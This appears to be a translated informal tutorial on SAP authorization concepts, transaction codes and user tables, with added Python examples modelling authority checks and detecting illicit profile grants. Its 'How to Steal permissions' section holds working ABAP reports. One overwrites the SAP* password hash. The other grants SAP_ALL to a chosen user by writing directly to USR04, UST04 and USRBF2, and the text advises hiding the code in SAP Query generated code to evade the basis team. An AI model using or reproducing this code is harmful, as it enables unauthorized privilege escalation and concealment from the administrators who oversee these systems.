"IT168 informatization"
Generally, the basis team uses PFCG for authorization management, and when you save a role it generates a system profile name.
Remember that in SU01 a user has both a profile field and a role field? What is the relationship between the two?
First understand a few concepts.
1. Activity
Let's start with activity. What does activity mean? Look it up in a dictionary and you'll find it means a rule about which actions may be performed: for example, no smoking, only drinking, nothing after 22:00.
No, that's what my wife says. SAP is not like that; its activities are just insert, update, display and so on.
These were written into the TOBJ table by the Germans.
Activities can also be grouped into activity groups.
2. Activity category & authorization group
Role vs. profile
If you look at T020 you'll see what K, D, A, M and so on mean.
What is a profile? It can be understood as the whole set of authorization data: a named collection of authorization groups (you can fill them out with OBA7; permissions that are too fine-grained are not a good thing ^_^) together with activities. Usually a custom role generates a profile, and SAP authority control is based on the authorization data (objects) in the profile.
What is a role? A role is just a name to which you attach a profile. For example, if you create a user in SU01 without any role but add the SAP_ALL profile, it can do anything.
SAP itself ships with many default roles and profiles.
3. The most commonly used: PFCG
PFCG -> Authorizations -> Change authorization data ->
After entering, choose selection criteria to see all authorization objects.
You can also add authorization objects manually: for example, when a T-code gives you an authorization error, SU53 (from ABAP) shows which authorization object is missing, and you add it by hand.
If you choose authorization levels, you can subdivide permissions by account type; some go all the way down to a single table field, and you can even look at the authorization buffer for an object.
So that is how SAP controls rights: the butcher uses a small knife for a small slaughter.
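To make the profile / authorization object / activity relationship concrete, here is a small model of the check that runs behind a T-code (added example, not code from the article; the Z_ profile, the user and the failed-check log are constructed, and the ACTVT codes are the standard 01/02/03):

```python
"""Model of an SAP authorization check: a profile is a set of
authorizations, each one an authorization object with field/value lists,
and a check passes only if one authorization for that object covers every
field tested. Added example; profile Z_FI_DISPLAY_1000 is constructed."""
from dataclasses import dataclass

CREATE, CHANGE, DISPLAY = "01", "02", "03"   # ACTVT values (table TACT)
ANY = "*"                                     # full authorization for a field


@dataclass
class Authorization:
    obj: str      # authorization object, e.g. F_BKPF_BUK (company code)
    fields: dict  # field -> set of allowed values, e.g. {"BUKRS": {"1000"}}


PROFILES = {
    # SAP_ALL: every object, every field value ("it can do anything")
    "SAP_ALL": [Authorization(ANY, {})],
    # constructed role profile: display-only on documents of company code 1000
    "Z_FI_DISPLAY_1000": [
        Authorization("F_BKPF_BUK", {"BUKRS": {"1000"}, "ACTVT": {DISPLAY}}),
    ],
}


def _covers(auth, obj, checks):
    """One authorization covers the check if its object matches and every
    tested field is either fully authorized ('*') or lists the value."""
    if auth.obj not in (ANY, obj):
        return False
    for fld, value in checks:
        allowed = auth.fields.get(fld, {ANY} if auth.obj == ANY else set())
        if ANY not in allowed and value not in allowed:
            return False
    return True


def authority_check(user_profiles, obj, checks, failed_log):
    """Equivalent of AUTHORITY-CHECK OBJECT obj ID f1 FIELD v1 ...: True if
    any authorization in the user's profiles covers all checks. A failure is
    recorded as object + tested values, the entry SU53 shows from USR07."""
    for prof in user_profiles:
        if any(_covers(a, obj, checks) for a in PROFILES.get(prof, [])):
            return True
    failed_log.append((obj, dict(checks)))
    return False


if __name__ == "__main__":
    log, user = [], ["Z_FI_DISPLAY_1000"]
    print(authority_check(user, "F_BKPF_BUK", [("BUKRS", "1000"), ("ACTVT", DISPLAY)], log))
    print(authority_check(user, "F_BKPF_BUK", [("BUKRS", "1000"), ("ACTVT", CHANGE)], log))
    print(log)  # the missing object and values, as SU53 would report them
```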
4. Several T-codes for authorization.
(i) Role-related T-codes:
PFAC Standard
PFAC_CHG Change
PFAC_DEL Delete
PFAC_DIS Display
PFAC_INS New
PFAC_STR
PFCG Create
ROLE_CMP Comparison
SUPC Bulk generation of role profiles
SWUJ Test
SU03 Check authorization data
SU25, SU26 Check updated profiles
(ii) User-related T-codes:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, SU51, SU52
SU1
SU10 Batch
SU12 Batch
SUCOMP: Maintain user company address
SU2: Change user parameters
SUIM: User Information System
User group:
SUGR: Maintenance
SUGRD: Display
SUGRD_NAV: or the maintenance
SUGR_NAV: or the display
(iii) About profile & authorization data
SU02: Create a profile directly, without a role
SU20: Subdivide authorization fields
SU21 (SU03): Maintain authorization objects (TOBJ, USR12). For accounting documents you can subdivide into:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW: Accounting Document: Change Default Values for Doc.Type/PstKy
Then you go in and subdivide further; these values are saved in the USR12 table. The DB layer is UTAB.
SU22, SU24: Subdivision for specific transaction codes
SU53: When you get an authorization error, shows which authorization objects you lack
SU56: Analyze authorization data buffers
SU87: Check the history generated by user changes
SU96, SU97, SU98, SU99: What are these for?
SUPC: Bulk generation of role profiles
DB and logical layers:
SUKRI: Transaction combinations critical for security
Tables:
TOBJ: All available authorization objects (all of them are here)
USR12: User-level authorization values
-----------------------------
USR01: Master data
USR02: The password is here
USR04: Authorizations
USR03: User address data
USR05: User master parameter ID
USR06: Additional data per user
USR07: Object/values of authorization checks that failed
USR08: Table for user menu entries
USR09: Entries for user menus (work areas)
USR10: User master authorization profiles
USR11: User master texts for profiles (USR10)
USR12: User master authorization values
USR13: Short texts for authorizations
USR14: Surchargeable language versions per user
USR15: External user name
USR16: Values for variables for user authorizations
USR20: Date of last user master reorganization
USR21: Assign user name address key
USR22: Logon data without kernel access
USR30: Additional information for user menu
USR40: Table for illegal passwords
USR41: Current user
USREFUS:
USRBF2, USRBF3
UST04: User profiles are here
UST10C: Composite profiles
UST10S: Single profiles (corresponding to roles)
UST12: Authorizations
..............................
How to Steal permissions
..............................
User:
User types: the usual user types are A. dialog (normal user), B. communication, C. system, D. service, E. reference.
Usually you will want to check authorization before using any T-code.
AUTHORITY_CHECK: this function only does a small check, whether your user exists and whether it has expired.
** If you are coding, using only this function is enough.
AUTHORITY_CHECK_TCODE: checks a T-code.
This function really checks the authorization objects.
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
A program that changes the SAP* password to 123; very simple.
We find the user logon table, USR02.
(DF52478E6FF90EEB is what SAP's password encryption stores in the DB. What is SAP's password encryption?)
REPORT zmodsap.
DATA zusr02 LIKE usr02.
SELECT SINGLE * INTO zusr02 FROM usr02 WHERE bname = 'SAP*'.
zusr02-bcode = 'DF52478E6FF90EEB'.
UPDATE usr02 FROM zusr02.
Now the question is how to keep your basis team from noticing. Very simple: hide the code in a query. When you build a query, the query generates code, and you add yours to it; who would think of that??? Then wait for your basis team to cry...
That is too vicious. Or quietly work on your own user.
You have to be very clear about the authority structure here.
Permissions involve three tables.
a. USR04  b. UST04  c. USRBF2 (this table corresponds to the authorization objects used)
*&---------------------------------------------------------------------*
*& Report: steal SAP all right
*& Creation date: 2004.04.01
*& Created by: Stone.Fu
*& Description: Can steal SAP all permissions
*& Modified date: 2005.11.02
*& Description: Put this code hidden in the Report Painter or query code
*&---------------------------------------------------------------------*
REPORT zrightsteal.
DATA zusr04 LIKE usr04.                               " USR04 work area
DATA zust04 LIKE ust04.                               " UST04 work area
DATA zprofs LIKE usr04-profs.
DATA zusrbf2 LIKE usrbf2 OCCURS 0 WITH HEADER LINE.   " USRBF2 internal table
* Update authorization table USR04
SELECT SINGLE * INTO zusr04 FROM usr04 WHERE bname = 'ZABC2'.
MOVE 'C SAP_ALL' TO zprofs.                           " SAP_ALL permissions
zusr04-nrpro = '14'.
zusr04-profs = zprofs.
UPDATE usr04 FROM zusr04.
* Update user authorization master table UST04
SELECT SINGLE * INTO zust04 FROM ust04 WHERE bname = 'ZABC2'.
zust04-profile = 'SAP_ALL'.                           " the SAP_ALL permissions
UPDATE ust04 FROM zust04.
* Alternatively, insert
*zust04-mandt = '200'.
*zust04-bname = 'ZABC2'.
*zust04-profile = 'SAP_ALL'.
*INSERT ust04 FROM zust04.
SELECT * FROM usrbf2 INTO TABLE zusrbf2 WHERE bname = 'SAP*'.
LOOP AT zusrbf2.
  zusrbf2-bname = 'ZABC2'.
  MODIFY zusrbf2 INDEX sy-tabix TRANSPORTING bname.
ENDLOOP.
INSERT usrbf2 FROM TABLE zusrbf2 ACCEPTING DUPLICATE KEYS.
Create yourself a ZTEST user without any permissions, then run report ZRIGHTSTEAL on a test machine.
Afterwards ZTEST has SAP_ALL. Then you hide the code inside SAP Query's generated code; plain ABAP code is too easy to find.
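The flip side for the basis team is that a direct UPDATE on USR04/UST04 leaves no SU01 change history, which is the first thing to check for. The sweep below is an added example (not the article's code) over constructed exports of UST04, the USH04 change history that SU87 reads, and USR02; the column order and sample rows are assumed:

```python
"""Detection sweep for profiles granted by direct table writes.
Added example: reads constructed exports of UST04 (user -> profile),
USH04 (change history written by SU01, which a direct UPDATE/INSERT on
UST04/USR04 never produces) and USR02 (user type), and flags users a
basis admin should review. Column order is an assumption."""

CRITICAL_PROFILES = {"SAP_ALL", "SAP_NEW"}

UST04 = [                        # constructed: (BNAME, PROFILE)
    ("SAP*", "SAP_ALL"),
    ("JDOE", "Z_FI_DISPLAY_1000"),
    ("RFCBATCH", "SAP_ALL"),
    ("ZABC2", "SAP_ALL"),        # the user promoted by the report above
]
USH04 = [                        # constructed: (BNAME, PROFS, MODBY, MODDA)
    ("SAP*", "SAP_ALL", "SAP", "20000101"),
    ("JDOE", "Z_FI_DISPLAY_1000", "BASISADM", "20240105"),
    ("RFCBATCH", "SAP_ALL", "BASISADM", "20240105"),
]
USR02 = {"SAP*": "A", "JDOE": "A", "RFCBATCH": "B", "ZABC2": "A"}  # BNAME -> USTYP


def sweep(ust04, ush04, usr02):
    """Return sorted (user, finding) pairs. Three checks:
    1. any user holding a critical profile;
    2. a dialog user (USTYP A) holding one, the classic target above;
    3. a UST04 assignment with no matching change-history row, which is
       what a direct table write leaves behind and SU01 never does."""
    history = {(bname, profs) for bname, profs, _, _ in ush04}
    findings = []
    for bname, profile in ust04:
        if profile in CRITICAL_PROFILES:
            findings.append((bname, f"holds critical profile {profile}"))
            if usr02.get(bname) == "A":
                findings.append((bname, f"dialog user with {profile}"))
        if (bname, profile) not in history:
            findings.append((bname, f"{profile} assigned without change history (direct table write?)"))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in sweep(UST04, USH04, USR02):
        print(f"{user:10} {finding}")
```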